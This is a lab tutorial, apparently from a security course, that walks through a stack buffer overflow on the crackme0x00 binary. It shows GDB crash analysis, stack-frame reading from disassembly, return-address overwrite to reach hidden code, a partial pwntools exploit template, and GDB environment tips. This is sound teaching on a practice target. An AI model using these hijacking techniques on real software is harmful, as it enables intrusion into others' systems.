In this tutorial, you'll learn, for the first time, how to write a control-flow hijacking attack that exploits a buffer overflow vulnerability!
There are a few ways to check the reason for a segmentation fault:
Note: "/tmp/[secret]/input" below is a placeholder name for your secret input file in /tmp.
/tmp/[secret]/input
/tmp
Running GDB:
$ cd ~/tut03-stackovfl/ $ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > /tmp/[secret]/input $ gdb ./crackme0x00 > run </tmp/[secret]/input Starting program: ./crackme0x00 </tmp/[secret]/input IOLI Crackme Level 0x00 Password: Invalid Password! Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()
Checking logging messages (if you're working on your local machine):
$ dmesg | tail -1 [19513751.485863] crackme0x00[20200]: segfault at 41414141 ip 000000000804873c sp 00000000ffffd668 error 4 in crackme0x00[8048000+1000]
Note: dmesg is disabled on our lab server, but you can use it in your own local environment.
Checking logging messages (if you're working on our server):
When you're working under /tmp/ (and only then), our server stores dmesg-like logging information for you whenever a lab challenge crashes. For example, you can find a logging output file named "core_info" under your /tmp/[secret]/ directory if you crash our tutorial binary, crackme0x00:
/tmp/
core_info
/tmp/[secret]/
crackme0x00
$ mkdir /tmp/[secret]/ $ cd /tmp/[secret]/ $ echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > input $ cat input | ~/tut03-stackovfl/./crackme0x00 ... $ ls core_info input $ cat core_info [New LWP 18] Core was generated by `/home/lab03/tut03-stackovfl/crackme0x00'. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x41414141 in ?? () eax 0x0 0 ecx 0x804b160 134525280 edx 0xf7fbe890 -134485872 ebx 0x0 0 esp 0xffffd5e8 0xffffd5e8 ebp 0x41414141 0x41414141 esi 0xf7fbd000 -134492160 edi 0x0 0 eip 0x41414141 0x41414141 eflags 0x10292 [ AF SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99
The instruction pointer was overwritten with 0x41414141 ("AAAA", part of our input string). Let's figure out exactly which part of our input tainted the instruction pointer.
$ cd /tmp/[secret]/ $ echo AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ > input $ cat input | ~/tut03-stackovfl/./crackme0x00 $ dmesg | tail -1 [19514227.904759] crackme0x00[21172]: segfault at 46464646 ip 0000000046464646 sp 00000000ffffd688 error 14 in libc-2.27.so[f7de5000+1d5000]
What's the instruction pointer's value now, as a string? (man ascii might help.) Can you now tell what part of the string is overwriting it?
man ascii
You can infer the shape of a function's stack frame from the function's disassembly (for example, with Ghidra or objdump):
$ objdump -M intel-mnemonic -d crackme0x00 ... 080486b3 <start>: 80486b3: 55 push ebp 80486b4: 89 e5 mov ebp,esp 80486b6: 83 ec 10 sub esp,0x10 ...
Let's analyze how the stack frame is constructed:
When start is called (by whatever other function calls it), the return address is automatically pushed onto the stack by the call instruction. So every stack frame always has the return address ("ra") at the top:
start
call
esp V <...> [ra]
ebp is a register that's used to point to the top of the current function's stack frame. When the function begins, "push ebp" pushes that register's previous value (from the calling function) to the stack, so that it can be properly restored later when the function returns. Then mov ebp,esp updates ebp to be correct for the current function.
ebp
push ebp
mov ebp,esp
ebp/esp V <...> [bp] [ra]
sub esp,0x10 reserves 0x10 bytes for local variables.
sub esp,0x10
esp ebp V V [??????????] [bp] [ra] |<- 0x10 ->|
Looking down a bit farther, at the call to scanf:
scanf
... 80486d3: 8d 45 f0 lea eax,[ebp-0x10] 80486d6: 50 push eax 80486d7: 68 11 88 04 08 push 0x8048811 80486dc: e8 9f fd ff ff call 8048480 <scanf@plt> ...
The first argument is 0x8048811 (you can check what's at that address -- it's "%s"), and the second is ebp-0x10. scanf will write its string output to its second argument, so we can consider that area on the stack to be the buffer.
"%s"
ebp-0x10
There could be other local variables within that 0x10 bytes, but in this case there aren't any. The only way to find out exactly how the local variables are arranged is to study the entire function (perhaps with the help of a decompiler) and see how it uses its stack frame.
So for our long, overflowing input string, the first 0x10 bytes will fit in the 0x10-byte buffer, the next 4 will overwrite the stored ebp, and the next 4 will overwrite the return address, which is what the instruction pointer will be set to when the function returns. That's why it ended up as FFFF -- those are the 0x14'th through 0x18'th bytes of our input.
FFFF
What do you expect ebp to end up as? Check core_info and see if you're right!
In this tutorial, we're going to hijack the control flow of crackme0x00 by overwriting the instruction pointer. As a first step, let's make it print out Password OK :) without giving it the correct password!
Password OK :)
80486ed: e8 2e fd ff ff call 8048420 <strcmp@plt> 80486f2: 83 c4 08 add esp,0x8 80486f5: 85 c0 test eax,eax 80486f7: 75 31 jne 804872a <start+0x77> ->80486f9: 68 3e 88 04 08 push 0x804883e 80486fe: e8 6d fd ff ff call 8048470 <puts@plt> ... 804872c: 68 92 88 04 08 push 0x8048892 8048731: e8 3a fd ff ff call 8048470 <puts@plt> 8048736: 83 c4 10 add esp,0x10
We're going to jump to 0x80486f9 so that it'll print out Password OK :).
0x80486f9
Which characters in the input should be changed to 0x80486f9? Keep in mind that x86 is a little-endian architecture.
$ hexedit /tmp/[secret]/input
"Ctrl+X" will exit and let you save your changes.
$ cat input | ~/tut03-stackovfl/./crackme0x00 IOLI Crackme Level 0x00 Password: Invalid Password! Password OK :) Segmentation fault
Today's main task is to modify a Python template for exploitation. Please edit the provided Python script (exploit.py) to hijack the control flow of crackme0x00! Most importantly, to get the flag, you need to hijack the control flow to reach unreachable code in the binary.
exploit.py
// To get the flag, your input seemingly needs to be both "250381" // and "no way you can reach!" at the same time! 8048706: 68 4d 88 04 08 push 0x804884d 804870b: 8d 45 f0 lea eax,[ebp-0x10] 804870e: 50 push eax 804870f: e8 0c fd ff ff call 8048420 <strcmp@plt> 8048714: 83 c4 08 add esp,0x8 8048717: 85 c0 test eax,eax 8048719: 75 1c jne 8048737 <start+0x84> ->804871b: 68 63 88 04 08 push 0x8048863 8048720: e8 d1 fe ff ff call 80485f6 <print_key>
In this template, we will start utilizing pwntools, which provides a set of libraries and tools to help writing exploits. Although we'll cover the details of pwntools in the next tutorial, you can have a glimpse here of how it looks.
#!/usr/bin/env python3 # import variables/functions from pwntools into our global namespace, # for easy access from pwn import * if __name__ == '__main__': # p32/64 for "packing" 32- or 64-bit integers # so, given an integer, it returns a packed (i.e., encoded) bytestring assert p32(0x12345678) == b'\x00\x00\x00\x00' # Q1 assert p64(0x12345678) == b'\x00\x00\x00\x00\x00\x00\x00\x00' # Q2 payload = b'Q3. your input here' # launch a process (with no arguments) p = process(['./crackme0x00']) # send an input payload to the process p.send(payload + b'\n') # or, shorter: "p.sendline(payload)" # make it interactive, meaning that we can interact with the # process's input/output (via a pseudo-terminal) p.interactive()
Modify Q1-3 in the template to make this exploit work.
[Task] Modify the template (exploit.py) to hijack the control flow and print out the flag.
If you'd like to practice more, can you make the exploit gracefully exit the program after hijacking its control multiple times?
Let's discuss how we can utilize the set exec-wrapper feature in GDB to better match the process's behavior outside the debugger. When exec-wrapper is set, the specified wrapper is used to launch programs for debugging. GDB starts your program with a shell command of the form exec-wrapper program. Any program that eventually calls execve on its arguments can be used as a wrapper.
set exec-wrapper
exec-wrapper
exec-wrapper program
execve
For example, you can use env (learn about it: man env) to pass an environment variable to the debugged program, without setting the variable in your shell’s environment:
env
man env
(gdb) set exec-wrapper env 'LD_PRELOAD=libtest.so' (gdb) run
For further reading about exec-wrapper, please refer to here.
In order to get a predictable stack in a system with ASLR disabled, set exec-wrapper env -i can be used to ensure that the program is launched in an empty environment while debugging. For example, you can use it when getting a core dump:
set exec-wrapper env -i
$ mkdir /tmp/[secret]/ $ cd /tmp/[secret]/ $ gdb-pwndbg ~/tut03-stackovfl/crackme0x00 pwndbg> set exec-wrapper env -i pwndbg> r Starting program: /home/lab03/tut03-stackovfl/crackme0x00 IOLI Crackme Level 0x00 Password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Invalid Password! Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () pwndbg> gcore Saved corefile core.545
Note that "set exec-wrapper env -i" is a default GDB setting on the lab server. If you don't want to use it, please disable it before debugging, e.g.,
$ export SHELLCODE="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $ gdb-pwndbg ~/jmp-to-env/target pwndbg> unset exec-wrapper pwndbg> r BBBB
On Linux, environment variables are stored at the top of the stack when a program is launched. Thus, the main reasons why stack addresses in GDB can be different from running the program by itself are that
LINES
COLUMNS
_
Hence, to make stack addresses consistent, we need to:
Use absolute paths when executing inside and outside of GDB, e.g.,
$ env -u _ /home/lab03/jmp-to-env/target [input]
Remove extra env variables, e.g.
pwndbg> set exec-wrapper env -u LINES -u COLUMNS -u _
By setting the exec-wrapper above, we can remove the three extra env variables while debugging so that the environment inside GDB matches the environment outside of it.
Or, alternatively, use env -i as your exec-wrapper to remove all environment variables, and run the binary outside of GDB with env -i as well.
env -i